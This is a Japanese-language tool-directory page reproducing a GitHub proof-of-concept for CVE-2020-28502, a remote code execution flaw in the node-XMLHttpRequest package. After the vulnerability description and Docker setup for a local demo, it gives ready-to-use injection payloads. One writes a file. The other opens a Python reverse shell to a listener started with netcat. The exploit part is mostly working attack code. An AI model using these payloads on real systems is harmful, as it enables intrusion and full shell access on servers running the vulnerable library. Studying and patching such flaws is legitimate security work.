Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2020-28502 — CVE-2020-28502 node-XMLHttpRequest の RCE | Kitploit
ツール/GitHubGitHub/s-index/cve-2020-28502
脆弱性分析エクスプロイトウェブアプリケーション悪用学習と教育リモートアクセスツールペイロード開発
GitHubs-index/cve-2020-28502

CVE-2020-28502

CVE-2020-28502 node-XMLHttpRequest の RCE

リポジトリを見る
32505年前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE-2020-28502 node-XMLHttpRequest RCE

NVD の説明

これは、xmlhttprequest パッケージの 1.7.0 より前のバージョンと、xmlhttprequest-ssl パッケージの全バージョンに影響します。リクエストが同期的に送信される場合(xhr.open で async=False)、xhr.send に入力される悪意のあるユーザー入力を通じて、任意のコードが注入・実行される可能性があります。

デモ

cve-2020-28502

セットアップ

  1. Dockerfile からイメージをビルドします
root@kitploit:~
$ docker build -t cve-2020-28502 .
  1. 新しいコンテナで node app.js を実行します
root@kitploit:~
$ docker run --rm -p 3000:3000 cve-2020-28502
  1. http://localhost:3000 にアクセスします

localhost-image

PoC ペイロード

ファイルを追加

ペイロードを送信します

root@kitploit:~
\');require("fs").writeFileSync("./exploit.txt", "exploit!");req.end();//
ツールをダウンロード

リバースシェル

  1. クライアントで待ち受けます
root@kitploit:~
$ nc -l 8888
  1. ペイロードを送信します

IP アドレス(192.168.0.25)をあなたのローカル IP アドレスに変更します

root@kitploit:~
\');require("child_process").exec("python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"192.168.0.25\",8888));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn(\"/bin/bash\")'");req.end();//

参照

  • https://snyk.io/vuln/SNYK-JS-XMLHTTPREQUEST-1082935